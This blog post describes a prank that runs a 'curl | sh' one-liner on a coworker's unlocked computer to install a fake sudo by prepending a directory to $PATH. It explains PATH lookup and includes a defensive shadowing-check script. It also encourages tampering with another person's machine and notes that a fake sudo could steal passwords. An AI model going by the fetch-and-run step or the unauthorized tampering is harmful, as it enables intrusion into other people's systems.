Evil Sudo

This article assumes basic knowledge of the command-line. It also assumes you are on Linux or Mac.

There is also a video to accompany this blog post if you prefer. youtube: RrgxRXZf0vI

Want to infuriate a coworker?

  1. Wait until they leave their computer unlocked.
  2. Open a terminal and run this command:
curl | sh
  3. Close the terminal.

Now, whenever they try to use sudo, they’ll see this:

10d20d7815 EXCEPTION unknown (0313)

Googling won’t help them, because that error is utter nonsense.

How does this work?

To understand what’s happening, you need to understand the following things:

  1. What curl is.
  2. How you can pipe text to a shell.
  3. What does, and how the shell (command-line) determines which programs to run.

What’s curl?

Curl takes a URL, makes an HTTP request, and returns the response right in the terminal. Curl can do a lot more than that, but for us, this is enough.

Type curl into your terminal. You should now see a wall of text. That text is the HTML of Google’s landing page.

Now type curl. I promise nothing bad will happen. What you see now is a shell script I wrote and hosted online. Curl went out and got it for you.

Sending text to a shell.

The pipe command looks like a pipe: |. It takes the output of one command and sends it to another command.

Type sh into your terminal. You are now in an sh shell. It’s a lot like a Bash or Z shell. You can play around in this shell if you want. Then type exit to get back to your normal shell.

Type echo "echo hi" | sh into your terminal. This sends the text “echo hi” to the sh shell to be run. sh runs that command and returns its output, which is “hi”.

So, looking at the command from the start of this blog post, can you see what curl | sh does?

It takes the result of curl, which is a shell script, and sends it to sh. sh then runs the shell script.

So, running curl | sh downloads a shell script called and runs it on your computer as you.

What does do?

Here’s what DOESN’T do: it doesn’t modify your sudo command. It can’t do that, because it doesn’t have root access.

Unix-based systems have a $PATH variable. To see yours, type echo $PATH. This variable tells your shell where to find programs: it is a colon-separated list of directories, and your shell looks through them in order until it finds a program with the name you typed, then runs that one.

adds a directory to your $PATH and then creates a fake sudo program in that directory. It does this by determining what shell you are using and adding a line to your rc file. So far, it only supports bash and zsh, but that covers 95% of all users. Now, when you run the sudo command, your shell finds the fake sudo first and runs it instead of the real sudo.
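To see the lookup order concretely, here is an added example (my own code, not the post's and not the prank script) that walks a $PATH value the way the shell does and flags when a command name is shadowed by something earlier in the list. It assumes only POSIX sh and mktemp; the function names are mine, and the two sudo directories it builds are constructed for the demo.

```shell
#!/bin/sh
# Added example, not from the original post: walk a PATH value the way the
# shell does and report every executable with a given name in lookup order.
# Function names (path_hits, first_hit, is_shadowed, demo) are mine.

# path_hits NAME PATHVALUE: print each matching executable, first match first.
path_hits() {
    name=$1
    rest=$2
    while [ -n "$rest" ]; do
        case $rest in
            *:*) dir=${rest%%:*}; rest=${rest#*:} ;;
            *)   dir=$rest; rest= ;;
        esac
        [ -z "$dir" ] && dir=.            # an empty entry means "current directory"
        [ -x "$dir/$name" ] && printf '%s\n' "$dir/$name"
    done
    return 0
}

# first_hit NAME PATHVALUE: the one executable the shell would actually run.
first_hit() {
    path_hits "$1" "$2" | head -n 1
}

# is_shadowed NAME PATHVALUE EXPECTED: true when the first hit is not the
# expected real binary, i.e. something earlier in PATH has hijacked the name.
is_shadowed() {
    hit=$(first_hit "$1" "$2")
    [ -n "$hit" ] && [ "$hit" != "$3" ]
}

# Demonstration on constructed directories so it runs without touching the real
# system: "sys" holds the genuine sudo, a user-writable "evil" dir holds a fake
# one, and "evil" is placed first in PATH just as the prank script does.
demo() {
    base=$(mktemp -d)
    mkdir -p "$base/sys" "$base/evil"
    printf '#!/bin/sh\necho real sudo\n' > "$base/sys/sudo"
    printf '#!/bin/sh\necho fake sudo\n' > "$base/evil/sudo"
    chmod +x "$base/sys/sudo" "$base/evil/sudo"
    if is_shadowed sudo "$base/evil:$base/sys" "$base/sys/sudo"; then
        echo "sudo is shadowed: $(first_hit sudo "$base/evil:$base/sys") runs first"
    fi
    rm -rf "$base"
}

demo
```

In bash or zsh, type -a sudo is the quick manual version of this check: it lists every sudo on your PATH in lookup order, so anything listed before the system's own sudo deserves a look.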

Don’t worry though! is harmless.

This could be much worse

is annoying, but it could be much worse. It could pretend to be the real sudo command and steal your password. Once it has your password, it could delete all files on your computer. Scary.

Make sure you only run commands you trust!

Learn more

The source code and a command to remove are available here.